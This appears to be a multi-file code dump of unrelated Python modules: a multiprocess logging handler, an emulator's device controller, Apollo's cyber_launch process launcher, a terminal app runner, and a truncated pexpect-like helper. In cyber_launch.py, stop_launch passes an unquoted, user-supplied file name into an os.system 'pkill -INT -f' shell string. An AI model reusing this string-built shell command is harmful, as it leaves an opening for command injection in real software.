# ensure that exc_info and args
# have been stringified. Removes any chance of
# unpickleable things inside and possibly reduces
# message size sent over the pipe
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
dummy = self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
def __del__(self):
self.close()
class MultiProcRotatingFileHandler(MultiProcHandler):
subhandler_cls = RotatingFileHandler
def __init__(self, filename, mode="a", maxBytes=2 ** 20, backupCount=0):
super().__init__(filename, mode, maxBytes, backupCount)
class MultiProcStreamHandler(MultiProcHandler):
subhandler_cls = StreamHandler
def __init__(self, stream):
super().__init__(stream)
class MultiProcBufferingSMTPHandler(MultiProcHandler):
subhandler_cls = BufferingSMTPHandler
def __init__(
self,
capacity,
mailhost,
toaddrs,
subject=None,
flushLevel=ERROR,
*,
credentials=None,
fromaddr=None,
secure=None,
mailport=None,
timeout=5.0
):
super().__init__(
capacity=capacity,
mailhost=mailhost,
toaddrs=toaddrs,
subject=subject,
flushLevel=flushLevel,
credentials=credentials,
fromaddr=fromaddr,
secure=secure,
mailport=mailport,
timeout=timeout,
)
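# --- Hedged usage sketch (editorial addition, not part of the original module) ---
# BufferingSMTPHandler buffers records like MemoryHandler and mails the whole
# buffer once a record at flushLevel (ERROR by default) arrives or flush() runs.
# The host, addresses and credentials below are placeholders, not real endpoints:
#
#   import logging
#   handler = BufferingSMTPHandler(
#       capacity=200,
#       mailhost=("smtp.example.com", 587),
#       toaddrs=["ops@example.com"],
#       subject="Batch job log",
#       credentials=("bot@example.com", "app-password"),
#       secure=(),   # a non-None secure value makes send_mail() issue STARTTLS
#   )
#   logging.getLogger(__name__).addHandler(handler)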
|
device_controller.py
|
'''
Device Controller to handle devices
'''
import json
import logging
import queue
import threading
from http import HTTPStatus
import requests
from utils import utils
from utils.errors import AldebaranError, ArchitectureError
from utils.utils import GenericRequestHandler, GenericServer
from hardware.memory.memory import SegfaultError
logger = logging.getLogger('hardware.device_controller')
class DeviceController:
'''
Device Controller
'''
def __init__(self, host, port, system_addresses, system_interrupts, ioports):
self.system_addresses = system_addresses
self.system_interrupts = system_interrupts
self._device_registry = [0] * system_addresses['device_registry_size']
self._device_status_table = [0] * system_addresses['device_status_table_size']
self.output_queue = queue.Queue()
self._stop_event = threading.Event()
self._server = GenericServer((host, port), GenericRequestHandler, None, self._handle_incoming_request)
self._input_thread = threading.Thread(target=self._server.serve_forever)
self._output_thread = threading.Thread(target=self._output_thread_run)
self._ping_thread = threading.Thread(target=self._ping_thread_run)
self.ioports = ioports
self.interrupt_controller = None
self.architecture_registered = False
def register_architecture(self, interrupt_controller):
'''
Register other internal devices
'''
self.interrupt_controller = interrupt_controller
for ioport in self.ioports:
ioport.register_architecture(self)
self.architecture_registered = True
def start(self):
'''
Start input, output and ping threads
'''
if not self.architecture_registered:
raise ArchitectureError('Device Controller cannot run without registering architecture')
logger.info('Starting...')
self._input_thread.start()
self._output_thread.start()
self._ping_thread.start()
logger.info('Started.')
def stop(self):
'''
Stop input, output and ping threads
'''
logger.info('Stopping...')
self._server.shutdown()
self._server.server_close()
self._input_thread.join()
self._stop_event.set()
self._output_thread.join()
self._ping_thread.join()
logger.info('Stopped.')
def read_byte(self, pos, silent=False):
'''
Read byte from device registry or device status table
'''
if self.system_addresses['device_registry_address'] <= pos < self.system_addresses['device_registry_address'] + self.system_addresses['device_registry_size']:
value = self._device_registry[pos - self.system_addresses['device_registry_address']]
elif self.system_addresses['device_status_table_address'] <= pos < self.system_addresses['device_status_table_address'] + self.system_addresses['device_status_table_size']:
value = self._device_status_table[pos - self.system_addresses['device_status_table_address']]
else:
raise SegfaultError('Segmentation fault when trying to read byte at {}'.format(utils.word_to_str(pos)))
if not silent:
logger.debug('Read byte %s from %s.', utils.byte_to_str(value), utils.word_to_str(pos))
return value
def write_byte(self, pos, value, silent=False):
'''
Cannot write to device registry or device status table
'''
raise SegfaultError('Segmentation fault when trying to write byte at {}'.format(utils.word_to_str(pos)))
def read_word(self, pos, silent=False):
'''
Read word from device registry or device status table
'''
if self.system_addresses['device_registry_address'] <= pos < self.system_addresses['device_registry_address'] + self.system_addresses['device_registry_size'] - 1:
relative_pos = pos - self.system_addresses['device_registry_address']
value = (self._device_registry[relative_pos] << 8) + self._device_registry[relative_pos + 1]
elif self.system_addresses['device_status_table_address'] <= pos < self.system_addresses['device_status_table_address'] + self.system_addresses['device_status_table_size'] - 1:
relative_pos = pos - self.system_addresses['device_status_table_address']
value = (self._device_status_table[relative_pos] << 8) + self._device_status_table[relative_pos + 1]
else:
raise SegfaultError('Segmentation fault when trying to read word at {}'.format(utils.word_to_str(pos)))
if not silent:
logger.debug('Read word %s from %s.', utils.word_to_str(value), utils.word_to_str(pos))
return value
def write_word(self, pos, value, silent=False):
'''
Cannot write to device registry or device status table
'''
raise SegfaultError('Segmentation fault when trying to write word at {}'.format(utils.word_to_str(pos)))
def _set_device_status(self, ioport_number, status):
if status < 0:
status = 0
if status > 255:
status = 255
changed = status != self._device_status_table[ioport_number]
self._device_status_table[ioport_number] = status
if changed:
self.interrupt_controller.send(self.system_interrupts['device_status_changed'][ioport_number])
def _output_thread_run(self):
while True:
try:
ioport_number, device_host, device_port, command, data = self.output_queue.get(timeout=0.1)
except queue.Empty:
if self._stop_event.wait(0):
break
continue
logger.debug('Command "%s" from IOPort %s', command, ioport_number)
if command == 'data':
response = self._send_request(device_host, device_port, 'data', data)
if response.status_code != 200:
raise DeviceError('Could not send data: {}'.format(response.text))
logger.debug('[Device] %s', response.json()['message'])
else:
logger.error('Unknown command')
def _ping_thread_run(self):
ping_period = 1 # sec
while True:
for ioport in self.ioports:
if ioport.registered:
self._check_and_update_device_status(ioport)
if self._stop_event.wait(ping_period):
break
def _check_and_update_device_status(self, ioport):
ponged = self._ping_device(ioport)
if ponged:
ping_message = 'ponged'
else:
ping_message = 'did not pong'
logger.debug(
'Device[%s:%s] @ IOPort[%s] %s.',
ioport.device_host, ioport.device_port,
ioport.ioport_number,
ping_message,
)
if ponged:
new_status = 0
else:
new_status = self._device_status_table[ioport.ioport_number] + 1
self._set_device_status(ioport.ioport_number, new_status)
def _ping_device(self, ioport):
try:
response = self._send_request(ioport.device_host, ioport.device_port, 'ping')
if response.status_code != 200:
raise DeviceError('Device did not pong.')
except DeviceControllerError:
return False
return True
def _send_request(self, device_host, device_port, command, data=None, content_type='application/octet-stream'):
if data is None:
data = b''
try:
response = requests.post(
'http://{}:{}/{}'.format(
device_host,
device_port,
command,
),
data=data,
headers={'Content-Type': content_type},
)
except requests.exceptions.ConnectionError:
raise DeviceControllerConnectionError('Could not connect to device.')
logger.debug('Request sent.')
return response
def _handle_incoming_request(self, path, headers, rfile):
'''
Handle incoming request from devices, called by GenericRequestHandler
'''
max_ioport_number = len(self.ioports) - 1
path = path.lstrip('/')
if '/' not in path:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Path must be /ioport/command',
}
)
ioport_number, command = path.split('/', 1)
try:
ioport_number = int(ioport_number)
if ioport_number < 0:
raise ValueError()
if ioport_number > max_ioport_number:
raise ValueError()
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'IOPort number must be an integer between 0 and {}.'.format(max_ioport_number),
}
)
try:
request_body_length = int(headers.get('Content-Length'))
except TypeError:
return (HTTPStatus.LENGTH_REQUIRED, None)
data = rfile.read(request_body_length)
return self._handle_input(ioport_number, command, data)
def _handle_input(self, ioport_number, command, data):
'''
Handle command from device
'''
logger.debug('Incoming command "%s" to IOPort %s', command, ioport_number)
if command == 'register':
return self._register_device(ioport_number, data)
if command == 'unregister':
return self._unregister_device(ioport_number)
if command == 'ping':
return (
HTTPStatus.OK,
{
'message': 'pong',
}
)
if command == 'data':
return self._send_data_to_ioport(ioport_number, data)
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Unknown command: {}'.format(command),
}
)
def _send_data_to_ioport(self, ioport_number, data):
if not self.ioports[ioport_number].registered:
logger.info('No device is registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'No device is registered to this IOPort.',
}
)
if len(data) > self.ioports[ioport_number].input_buffer_size:
logger.info('Too much data sent to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'Too much data sent.',
}
)
self.ioports[ioport_number].input_queue.put(data)
logger.info('Delivered data to IOPort %s.', ioport_number)
self.interrupt_controller.send(self.system_interrupts['ioport_in'][ioport_number])
return (
HTTPStatus.OK,
{
'message': 'Received data: {}'.format(utils.binary_to_str(data)),
}
)
def _register_device(self, ioport_number, data):
try:
data = json.loads(data)
except json.decoder.JSONDecodeError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Could not parse data.',
}
)
for field_name in {'type', 'id', 'host', 'port'}:
if field_name not in data:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Field "{}" missing.'.format(field_name),
}
)
try:
device_type = int(data['type'], 16)
if device_type < 0x00 or device_type > 0xFF:
raise ValueError()
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Device type must be a 1-byte hex number.',
}
)
try:
device_id = int(data['id'], 16)
if device_id < 0x00 or device_id > 0xFFFFFF:
raise ValueError()
device_id = list(device_id.to_bytes(3, 'big'))
except ValueError:
return (
HTTPStatus.BAD_REQUEST,
{
'error': 'Device ID must be a 3-byte hex number.',
}
)
device_host, device_port = data['host'], data['port']
if self.ioports[ioport_number].registered:
logger.info('A device is already registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'A device is already registered to this IOPort.',
}
)
if self.ioports[ioport_number].input_queue.qsize() > 0:
logger.info('IOPort %s input queue not empty.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'IOPort input queue not empty.',
}
)
logger.info('Registering device to IOPort %s...', ioport_number)
logger.info(
'Device type and ID: %s %s',
utils.byte_to_str(device_type),
' '.join(utils.byte_to_str(device_id[i]) for i in range(3)),
)
logger.info('Device host and port: %s:%s', device_host, device_port)
self._device_registry[4 * ioport_number] = device_type
for idx in range(3):
self._device_registry[4 * ioport_number + 1 + idx] = device_id[idx]
self._set_device_status(ioport_number, 0)
self.ioports[ioport_number].register_device(device_host, device_port)
self.interrupt_controller.send(self.system_interrupts['device_registered'])
logger.info('Device registered to IOPort %s.', ioport_number)
return (
HTTPStatus.OK,
{
'message': 'Device registered.',
}
)
def _unregister_device(self, ioport_number):
if not self.ioports[ioport_number].registered:
logger.info('No device is registered to IOPort %s.', ioport_number)
return (
HTTPStatus.FORBIDDEN,
{
'error': 'No device is registered to this IOPort.',
}
)
logger.info('Unregistering device from IOPort %s...', ioport_number)
for idx in range(4):
self._device_registry[4 * ioport_number + idx] = 0
self._set_device_status(ioport_number, 0)
self.ioports[ioport_number].unregister_device()
self.interrupt_controller.send(self.system_interrupts['device_unregistered'])
logger.info('Device unregistered from IOPort %s.', ioport_number)
return (
HTTPStatus.OK,
{
'message': 'Device unregistered.',
}
)
# pylint: disable=missing-docstring
class DeviceControllerError(AldebaranError):
pass
class DeviceControllerConnectionError(DeviceControllerError):
pass
class DeviceError(DeviceControllerError):
pass
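# --- Hedged protocol sketch (editorial addition, derived from the handlers above) ---
# A device registers itself by POSTing JSON to /<ioport_number>/register on this
# controller; "type" is a 1-byte hex string and "id" a 3-byte hex string. The
# controller address and device host/port below are placeholders for illustration.
#
#   import json
#   import requests
#   payload = json.dumps({
#       'type': '01',
#       'id': '0000ab',
#       'host': 'localhost',   # where the controller can reach the device
#       'port': 8888,
#   })
#   requests.post(
#       'http://localhost:35000/0/register',
#       data=payload,
#       headers={'Content-Type': 'application/json'},
#   )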
|
cyber_launch.py
|
#!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
def __init__(self, msg):
logging.Formatter.__init__(self, msg)
def format(self, record):
levelname = record.levelname
if levelname in COLORS:
if levelname == 'DEBUG':
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[0] + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
record.msg.split('#')[-1] + RESET_SEQ
else:
record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
g_process_name + RESET_SEQ
record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
" " + record.msg.split('#')[-1] + RESET_SEQ
return logging.Formatter.format(self, record)
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
stop()
os.chdir(g_pwd)
logger.info('cyber_launch exit.')
atexit.register(exit_handler)
def singleton(cls):
instances = {}
def getinstance(*args, **kwargs):
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
def module_monitor(mod):
while True:
line = mod.popen.stdout.readline()
if line:
logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
continue
time.sleep(0.01)
class ProcessWrapper(object):
def __init__(self, binary_path, dag_num, dag_list, process_name,
process_type, sched_name, exception_handler=''):
self.time_of_death = None
self.started = False
self.binary_path = binary_path
self.dag_num = dag_num
self.dag_list = dag_list
self.name = process_name
self.sched_name = sched_name
self.process_type = process_type
self.popen = None
self.exit_code = None
self.args = []
self.pid = -1
self.exception_handler = exception_handler
def wait(self):
if self.started:
self.popen.wait()
def start(self):
"""
Start a manager in process name
"""
if self.process_type == 'binary':
args_list = self.name.split()
else:
args_list = [self.binary_path, '-d'] + self.dag_list
if len(self.name) != 0:
args_list.append('-p')
args_list.append(self.name)
if len(self.sched_name) != 0:
args_list.append('-s')
args_list.append(self.sched_name)
self.args = args_list
try:
self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except Exception as err:
logger.error('Subprocess Popen exception: ' + str(err))
return 2
else:
if self.popen.pid == 0 or self.popen.returncode is not None:
logger.error('Start process [%s] failed.' % self.name)
return 2
th = threading.Thread(target=module_monitor, args=(self, ))
th.setDaemon(True)
th.start()
self.started = True
self.pid = self.popen.pid
logger.info('Start process [%s] successfully. pid: %d' %
(self.name, self.popen.pid))
logger.info('-' * 120)
return 0
def is_alive(self):
"""
Check the process if is still running
@return: True if process is still running
@rtype: bool
"""
if not self.started:
return False
if self.popen is None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
self.exit_code = self.popen.poll()
if self.exit_code is not None:
if self.time_of_death is None:
self.time_of_death = time.time()
return False
return True
def get_exit_state(self):
"""
@return: description of exit state
@rtype: str
"""
if self.popen.returncode is None:
pass
elif self.popen.returncode != 0:
output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
(self.name, self.pid, self.exit_code, ' '.join(self.args))
logger.error(output)
else:
output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
(self.name, self.pid, ' '.join(self.args))
logger.error(output)
@singleton
class ProcessMonitor(object):
def __init__(self):
self.procs = []
self.dead_cnt = 0
self.done = False
self.is_shutdown = False
def register(self, p):
"""
Register process with L{ProcessMonitor}
@param p: Process
@type p: L{Process}
"""
if self.has_process(p.name):
logger.error(
'Cannot add process due to duplicate name "%s".' % p.name)
elif self.is_shutdown:
logger.error(
'Cannot add process [%s]: the monitor has been stopped.' % p.name)
else:
self.procs.append(p)
def has_process(self, name):
"""
@return: True if the process is still being monitored. If False, the
process has died or was never registered with this monitor
@rtype: bool
"""
return len([p for p in self.procs if p.name == name]) > 0
def check_cleanup(self):
"""
Check whether processes are alive and clean up dead ones
"""
dead_cnt = 0
for pw in self.procs:
if self.is_shutdown:
break
if pw.process_type == 'binary':
continue
try:
if not pw.is_alive():
if pw.exception_handler == "respawn":
logger.warning(
'child process [%s][%d] exited, respawning!' % (pw.name, pw.pid))
result = pw.start()
if result != 0:
logger.error(
'respawn process [%s] failed, stop all!' % (pw.name))
stop()
elif pw.exception_handler == "exit":
logger.warning(
'child process [%s][%d] exited, stopping all.' % (pw.name, pw.pid))
stop()
dead_cnt += 1
except Exception:
dead_cnt += 1
traceback.print_exc()
if dead_cnt > 0:
self.dead_cnt = dead_cnt
if self.dead_cnt == len(self.procs):
self.is_shutdown = True
def run(self):
"""
Run the process monitor until all processes have died.
"""
while not self.is_shutdown:
self.check_cleanup()
time.sleep(0.2)
for p in self.procs:
p.get_exit_state()
if self.dead_cnt == len(self.procs):
logger.info("All processes has died.")
return True
return False
def stop(self, signal):
"""
Stop all processes in monitor
"""
for p in self.procs:
if p.is_alive():
p.popen.send_signal(signal)
for p in self.procs:
if p.is_alive():
logger.warning('Waiting for [%s][%s] to exit.' % (p.name, p.pid))
p.wait()
logger.info(
'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
# Reset members
self.procs = []
self.dead_cnt = 0
def start(launch_file=''):
"""
Start all modules in xml config
"""
pmon = ProcessMonitor()
# Find launch file
if launch_file[0] == '/':
launch_file = launch_file
elif launch_file == os.path.basename(launch_file):
launch_file = os.path.join(cyber_path, 'launch', launch_file)
else:
if os.path.exists(os.path.join(g_pwd, launch_file)):
launch_file = os.path.join(g_pwd, launch_file)
else:
logger.error('Cannot find launch file: %s ' % launch_file)
sys.exit(1)
logger.info('Launch file [%s]' % launch_file)
logger.info('=' * 120)
if not os.path.isfile(launch_file):
logger.error('Launch xml file %s does not exist' % launch_file)
sys.exit(1)
try:
tree = ET.parse(launch_file)
except Exception:
logger.error('Failed to parse the launch file: invalid XML.')
sys.exit(1)
total_dag_num = 0
dictionary = {}
dag_dict = {}
root1 = tree.getroot()
for module in root1.findall('module'):
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
process_type = module.find('type')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if process_type != 'binary':
if dag_conf is None or not dag_conf.strip():
logger.error('Library dag conf is null')
continue
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
process_name = process_name.strip()
if str(process_name) in dictionary:
dictionary[str(process_name)] += 1
else:
dictionary[str(process_name)] = 1
if str(process_name) not in dag_dict:
dag_dict[str(process_name)] = [str(dag_conf)]
else:
dag_dict[str(process_name)].append(str(dag_conf))
if dag_conf is not None:
total_dag_num += 1
process_list = []
root = tree.getroot()
for env in root.findall('environment'):
for var in list(env):  # getchildren() was removed in Python 3.9
os.environ[var.tag] = str(var.text)
for module in root.findall('module'):
module_name = module.find('name').text
dag_conf = module.find('dag_conf').text
process_name = module.find('process_name').text
sched_name = module.find('sched_name')
process_type = module.find('type')
exception_handler = module.find('exception_handler')
if process_type is None:
process_type = 'library'
else:
process_type = process_type.text
if process_type is None:
process_type = 'library'
process_type = process_type.strip()
if sched_name is None:
sched_name = "CYBER_DEFAULT"
else:
sched_name = sched_name.text
if process_name is None:
process_name = 'mainboard_default_' + str(os.getpid())
if dag_conf is None:
dag_conf = ''
if module_name is None:
module_name = ''
if exception_handler is None:
exception_handler = ''
else:
exception_handler = exception_handler.text
module_name = module_name.strip()
dag_conf = dag_conf.strip()
process_name = process_name.strip()
sched_name = sched_name.strip()
exception_handler = exception_handler.strip()
logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
(module_name, process_type, process_name, sched_name, dag_conf,
exception_handler))
if process_name not in process_list:
if process_type == 'binary':
if len(process_name) == 0:
logger.error(
'Start binary failed. Binary process_name is null.')
continue
pw = ProcessWrapper(
process_name.split()[0], 0, [""], process_name, process_type,
"", exception_handler)  # no sched_name for binaries; keep exception_handler in its own slot
# Default is library
else:
pw = ProcessWrapper(
g_binary_name, 0, dag_dict[str(process_name)], process_name,
process_type, sched_name, exception_handler)
result = pw.start()
if result != 0:
logger.error(
'Start manager [%s] failed. Stop all!' % process_name)
stop()
pmon.register(pw)
process_list.append(process_name)
# No module in xml
if not process_list:
logger.error("No module was found in xml config.")
return
all_died = pmon.run()
if not all_died:
logger.info("Stop all processes...")
stop()
logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
"""
stop all modules
"""
pmon = ProcessMonitor()
if len(pmon.procs) == 0:
return
pmon.stop(sig)
logger.info('All processes have been stopped.')
sys.exit(0)
def stop_launch(launch_file):
"""
Stop the launch file
"""
if not launch_file:
cmd = 'pkill -INT cyber_launch'
else:
cmd = 'pkill -INT -f ' + launch_file
os.system(cmd)
time.sleep(3)
logger.info('Stop cyber launch finished.')
sys.exit(0)
def signal_handler(sig, frame):
logger.info('Keyboard interrupt received. Stop all processes.')
stop(sig)
def main():
"""
Main function
"""
if cyber_path is None:
logger.error(
'Error: environment variable CYBER_PATH not found, set environment first.')
sys.exit(1)
os.chdir(cyber_path)
parser = argparse.ArgumentParser(description='cyber launcher')
subparsers = parser.add_subparsers(help='sub-command help')
start_parser = subparsers.add_parser(
'start', help='launch/benchmark.launch')
start_parser.add_argument('file', nargs='?', action='store',
help='launch file, default is cyber.launch')
stop_parser = subparsers.add_parser(
'stop', help='stop all the module in launch file')
stop_parser.add_argument('file', nargs='?', action='store',
help='launch file, default stop all the launcher')
# restart_parser = subparsers.add_parser('restart', help='restart the module')
# restart_parser.add_argument('file', nargs='?', action='store', help='launch file,
# default is cyber.launch')
params = parser.parse_args(sys.argv[1:])
command = sys.argv[1]
if command == 'start':
start(params.file)
elif command == 'stop':
stop_launch(params.file)
# elif command == 'restart':
# restart(params.file)
else:
logger.error('Invalid command %s' % command)
sys.exit(1)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
main()
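# --- Hedged example launch file (editorial addition, shape derived from the XML
# parsing in start() above). The root tag name is not checked by the parser, and
# all names and paths below are placeholders, not taken from a real deployment.
#
#   <cyber>
#     <environment>
#       <GLOG_minloglevel>0</GLOG_minloglevel>
#     </environment>
#     <module>
#       <name>example</name>
#       <dag_conf>/apollo/example/dag/example.dag</dag_conf>
#       <process_name>example_process</process_name>
#       <type>library</type>
#       <sched_name>CYBER_DEFAULT</sched_name>
#       <exception_handler>respawn</exception_handler>
#     </module>
#   </cyber>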
|
run.py
|
from sancty.deps_types import Queue, Event, QueueEmpty, Terminal, Callable
from sancty.read import Reader, ReaderProtocol
from sancty.render import Renderer, RendererProtocol
import multiprocessing as mp
def create_process_reader(clss: ReaderProtocol):
class ProcessReadr(clss):
render_queue: Queue
exit_event: Event
resizing_event: Event
def __init__(self, term, render_queue, exit_event, resizing_event):
super().__init__(term)
self.exit_event = exit_event
self.render_queue = render_queue
self.resizing_event = resizing_event
def has_exited(self):
return self.exit_event.is_set()
def resizing_set(self):
self.resizing_event.set()
self.resizing = True
def resizing_clear(self):
self.resizing_event.clear()
self.resizing = False
def send_values(self, values):
self.render_queue.put(values)
def queue_size(self) -> int:
return self.render_queue.qsize()
def exit_set(self):
self.exit_event.set()
self.exited = True
return ProcessReadr
def create_process_renderer(clss: RendererProtocol):
class ProcessRendr(clss):
render_queue: Queue
exit_event: Event
resizing: Event
def __init__(self, term, render_queue, exit_event, resizing, replace_dict=None, special_slash_fn=None,
replace_dict_add=True, overwrite=False):
super().__init__(term, replace_dict, special_slash_fn, replace_dict_add, overwrite)
self.render_queue = render_queue
self.exit_event = exit_event
self.resizing = resizing
def has_exited(self) -> bool:
return self.exit_event.is_set()
def is_resizing(self) -> bool:
return self.resizing.is_set()
def update_values(self, values) -> tuple[bool, list]:
try:
new_values = self.render_queue.get(block=False)
values += new_values
return False, values
except QueueEmpty:
return True, values
def do_exit(self):
self.exit_event.set()
return ProcessRendr
def reader_process_start(term, reader, render_queue, exit_event, resizing):
if reader is not None:
reader_cls = create_process_reader(reader)
else:
reader_cls = create_process_reader(Reader)
# term = Terminal()
print("\n" * 20 + term.move_x(0) + term.move_up(20))
reader_inst: ReaderProtocol = reader_cls(term, render_queue, exit_event, resizing)
reader_inst.read_terminal()
def render_process_start(term, renderer, render_queue, exit_event, resizing, replace_dict, special_slash_fn,
replace_dict_add, overwrite):
if renderer is not None:
renderer_cls = create_process_renderer(renderer)
else:
renderer_cls = create_process_renderer(Renderer)
renderer_inst: RendererProtocol = renderer_cls(term, render_queue, exit_event, resizing, replace_dict,
special_slash_fn, replace_dict_add, overwrite)
renderer_inst.print_terminal()
def start_terminal(renderer=None, reader=None, replace_dict: dict[str, str | tuple[int, str]] = None,
special_slash_fn: Callable[[int, list, list], tuple[list, list]] = None,
replace_dict_add: bool = True, overwrite: bool = False, welcome_message="Welcome to Sancty Text!"):
render_queue = mp.Manager().Queue()
exit_event = mp.Manager().Event()
resizing = mp.Manager().Event()
term = Terminal()
print(welcome_message)
print("Press 'ESC', 'CTRL+C' or 'CTRL+D' to quit. "
"Type \\help for a list of '\\\\' commands (also clears all text).")
# print("\n" * 20 + term.move_x(0) + term.move_up(20))
input_process = mp.Process(target=reader_process_start, args=(term, reader, render_queue, exit_event, resizing,))
render_process = mp.Process(target=render_process_start, args=(term, renderer, render_queue, exit_event, resizing,
replace_dict, special_slash_fn, replace_dict_add,
overwrite,))
processes = []
input_process.start()
processes.append(input_process)
render_process.start()
processes.append(render_process)
for process in processes:
process.join()
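# --- Hedged usage sketch (editorial addition, not part of the original module) ---
# start_terminal() wires a reader process and a renderer process together through
# a managed Queue and two Events. The replacement mapping below only illustrates
# the replace_dict shape declared in the signature; it is an assumption, not a
# documented feature set.
#
#   if __name__ == '__main__':
#       start_terminal(
#           replace_dict={'->': '→'},
#           welcome_message='Sancty demo',
#       )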
|
uexpect.py
|
# Copyright (c) 2019 Vitaliy Zakaznikov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pty
import time
import sys
import re
from threading import Thread, Event
from subprocess import Popen
from Queue import Queue, Empty
class TimeoutError(Exception):
def __init__(self, timeout):
self.timeout = timeout
def __str__(self):
return 'Timeout %.3fs' % float(self.timeout)
class ExpectTimeoutError(Exception):
def __init__(self, pattern, timeout, buffer):
self.pattern = pattern
self.timeout = timeout
self.buffer = buffer
def __str__(self):
s = 'Timeout %.3fs ' % float(self.timeout)
if self.pattern:
s += 'for %s ' % repr(self.pattern.pattern)
if self.buffer:
s += 'buffer %s ' % repr(self.buffer[:])
s += 'or \'%s\'' % ','.join(['%x' % ord(c) for c in self.buffer[:]])
return s
class IO(object):
class EOF(object):
pass
class Timeout(object):
pass
EOF = EOF
TIMEOUT = Timeout
class Logger(object):
def __init__(self, logger, prefix=''):
self._logger = logger
self._prefix = prefix
def write(self, data):
self._logger.write(('\n' + data).replace('\n','\n' + self._prefix))
def flush(self):
self._logger.flush()
def __init__(self, process, master, queue, reader):
self.process = process
self.master = master
self.queue = queue
self.buffer = None
self.before = None
self.after = None
self.match = None
self.pattern = None
self.reader = reader
self._timeout = None
self._logger = None
self._eol = ''
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def logger(self, logger=None, prefix=''):
if logger:
self._logger = self.Logger(logger, prefix=prefix)
return self._logger
def timeout(self, timeout=None):
if timeout:
self._timeout = timeout
return self._timeout
def eol(self, eol=None):
if eol:
self._eol = eol
return self._eol
def close(self, force=True):
self.reader['kill_event'].set()
os.system('pkill -TERM -P %d' % self.process.pid)
if force:
self.process.kill()
else:
self.process.terminate()
os.close(self.master)
if self._logger:
self._logger.write('\n')
self._logger.flush()
def send(self, data, eol=None):
if eol is None:
eol = self._eol
return self.write(data + eol)
def write(self, data):
return os.write(self.master, data)
def expect(self, pattern, timeout=None, escape=False):
self.match = None
self.before = None
self.after = None
if escape:
pattern = re.escape(pattern)
pattern = re.compile(pattern)
if timeout is None:
timeout = self._timeout
timeleft = timeout
while True:
start_time = time.time()
if self.buffer is not None:
self.match = pattern.search(self.buffer, 0)
if self.match is not None:
self.after = self.buffer[self.match.start():self.match.end()]
self.before = self.buffer[:self.match.start()]
self.buffer = self.buffer[self.match.end():]
break
if timeleft < 0:
break
try:
data = self.read(timeout=timeleft, raise_exception=True)
except TimeoutError:
if self._logger:
self._logger.write((self.buffer or '') + '\n')
self._logger.flush()
exception = ExpectTimeoutError(pattern, timeout, self.buffer)
self.buffer = None
raise exception
timeleft -= (time.time() - start_time)
if data:
self.buffer = (self.buffer + data) if self.buffer else data
if self._logger:
